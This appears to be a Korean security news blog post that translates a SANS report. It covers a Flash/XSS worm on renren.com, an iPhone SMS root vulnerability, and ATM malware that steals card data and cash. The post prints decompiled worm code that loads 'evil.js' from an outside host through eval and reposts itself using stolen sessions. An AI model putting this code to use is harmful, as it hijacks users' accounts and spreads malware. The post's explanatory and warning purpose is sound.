이 글은 SANS의 Flash attack vectors (and worms) 글을 옮긴 것입니다.

중국의 SNS 사이트인 renren.com에서 플래시를 이용한 새로운 웜이 발견되었습니다. 이 웜은 핑크 플로이드의 Wish You Were Here 뮤직 비디오로 꾸민 플래시 파일과 크로스 사이트 스크립팅이 가능한 취약점을 이용하여 전파되고 있습니다.

해당 사이트는 페이스북처럼 서로 비디오를 공유할 수 있는 기능을 제공하고 있는데, 플래시 무비를 가리킬 수 있는 기능을 이용하면 Renren 사이트에서 사용되는 비디오 플레이어 코드의 취약점을 이용하여 익스플로잇이 가능한 상태입니다.

사용자가 SWF 파일을 올리면, playswf()라는 자바스크립트 함수를 이용하여 embed 태그를 생성하고 사용자가 올린 SWF 파일을 가리키게 되어있습니다. 실제로 생성되는 코드를 살펴보면 다음과 같이 됩니다:

<embed src=”"+o.filename+”” type=”application/x-shockwave-flash”
“+”width=”"+(o.width||”320″)+”” height=”"+(o.height||”240″)+”” allowFullScreen=”true”
wmode=”"+(o.wmode||”transparent”)+”” allowScriptAccess=”always” ></embed>

allowScriptAccess는 따로 지정되지 않으면 sameDomain이 기본값이기 때문에 같은 도메인에서 가져온 HTML 페이지만 접근 가능한 반면, 위와 같이 always로 지정되어 있으면 도메인과 상관없이 값을 가져올 수 있게 됩니다. 예를 들면 플래시 무비를 보고 있는 사용자의 쿠키값을 쉽게 가로챌 수 있게 되는 것입니다.

공격자는 369 바이트 길이의 악성 플래시 파일을 이용하고 있는데 디컴파일하면 다음과 같은 내용으로 되어있습니다:

var fun = 'var x=document.createElement("SCRIPT");x.src="http://n.[removed].com/xnxss1/evil.js"; x.defer=true;document.getElementsByTagName("HEAD")[0].appendChild(x);';
    flash.external.ExternalInterface.call('eval', fun);
  }

위의 코드를 이용해서 스크립트를 HEAD 부분에 집어넣어 evil.js라는 악성 스크립트를 실행하도록 하고, 한편으로는 훔쳐낸 계정 정보를 이용하여 다시 사이트에 POST 하여 악성 파일을 전파하게 됩니다.

var data = 'post= "filter":null,"reduceRight":null [...] :"Wish You Were Here @ 2016.","summary":"'+evil_swf+'","noteId":0}';
 data += '&tsc=';
 data += tsc;
 xhr_send("post","http://share.renren.com/share/submit.do",data,"preSend");

크로스 사이트 스크립팅 (XSS)은 이제 상대적으로 잘 알려져있지만, 이와 같은 실수를 하지 않도록 웹서비스 개발하시는 분들은 주의하셔야겠습니다.

iPhone에서 SMS로 받은 텍스트 메시지를 처리하는 코드의 버그로 인해, 원격에서 임의의 코드를 설치하고 루트 권한으로 실행할 수 있는 취약점을 Charlie Miller 씨가 발견했습니다. Miller 씨는 Mac OS X Security와 The Mac Hacker's Handbook의 저자입니다. 이번 취약점은 목요일에 싱가폴에서 열린 SyScan 컨퍼런스 발표 때 알려졌다고 합니다.

임의의 코드를 설치하고 실행할 수 있으므로 가령 GPS를 이용하여 사용자의 위치를 감시한다거나, 전화기의 마이크로 폰을 이용하여 대화 내용을 도청하거나, 봇넷을 구성해서 DDoS 공격을 하는 등 다양한 공격에 악용될 수 있습니다. 일반 애플리케이션들은 샌드박스 위에서 실행되기 때문에 전화기의 기능 사용에 제한이 있는 반면에, SMS는 루트 권한으로 실행되고 있기 때문에 전화기의 모든 기능을 제어하는 것이 가능합니다.

애플은 이 취약점을 수정하는 작업을 진행하고 있으며, 월말 즈음에는 패치를 내놓을 수 있을 것으로 보인다고 합니다. 패치 발표 후에 라스베가스에서 열리는 블랙햇 USA 컨퍼런스에서 이번 취약점의 세부 사항에 대해 발표될 것으로 보입니다.

다가오는 블랙햇 USA 2009 컨퍼런스에서 발표하기로 했던 ATM 취약점이 제조사의 압박으로 취소되면서 이슈가 되고 있습니다. 이와 관련해서 이전에 발생했던 ATM 해킹 사례를 소개해드리려고 합니다.

몇 달 전에 러시아와 우크라이나 지역에 설치된 20여대의 윈도우 XP 기반 ATM 기계에서 맬웨어가 발견되었습니다. 이 맬웨어는 델파이로 개발되었고 2007년 7월 이전에 내부 공모자를 통해 심어졌습니다. 이렇게 맬웨어가 설치된 ATM 기계의 카드 리더기에 제어 카드를 집어넣으면 맬웨어 조작 화면이 뜨고 키패드로 조작할 수 있습니다.

맬웨어가 시작되면 타겟 프로세스의 메모리를 직접 조작하여 코드를 주입하고, ATM 트랜잭션을 가로챕니다. 이렇게 트랜잭션 메시지를 모니터링하면서 계좌 번호와 PIN 정보를 수집하여 파일로 쌓아놓고, 공격자가 나중에 영수증 프린터를 통해 정보를 뽑아갈 수 있는 기능을 제공합니다. 물론 ATM 내부에 있는 현금을 모두 인출할 수 있는 기능도 가지고 있습니다. ATM에 현금이 가득 들어있는 경우 60만 불에 이르는 현금을 탈취할 수 있게 됩니다.

Trustwave가 공개한 ATM 맬웨어 분석 보고서에 따르면, 공격자가 맬웨어를 통해 아래의 명령들을 실행할 수 있다고 합니다.

• 로그 복구: 맬웨어가 실행되기 이전의 상태로 로그 파일을 되돌려놓아 흔적을 찾기 어렵게 합니다.
• 제거: 맬웨어가 수집한 정보를 삭제하고 악성 윈도우 서비스와 파일을 삭제해서 흔적을 지웁니다.
• 상태 표시: 그동안 수집한 트랜잭션, 카드, 키 통계와 맬웨어 버전을 표시합니다.
• 로그 삭제: 맬웨어가 수집한 정보를 삭제합니다.
• 리부팅: 맬웨어 권한을 조정하고 강제로 시스템을 리부팅 시킵니다.
• 프린터 테스트: ATM 영수증 프린터로 Hello와 123456789를 출력합니다.
• 수집 정보 출력: ATM 영수증 프린터를 이용하여 DES로 암호화한 수집 데이터를 출력합니다.
• 부가 기능: 암호를 물어보고 아래 기능을 추가로 실행할 수 있게 합니다.
• 공급 관리자 정보: ATM 소프트웨어를 이용하여 현재 수표/현금 보유량에 대한 정보를 가져옵니다.
• 스마트 카드 쓰기: 프린터 대신 스마트 카드에 직접 수집된 정보를 씁니다.

이 사례는 내부 공모자를 통해 맬웨어를 심은 경우이지만, 앞으로 나올 공격 기법은 어떤 것일지 귀추가 주목됩니다.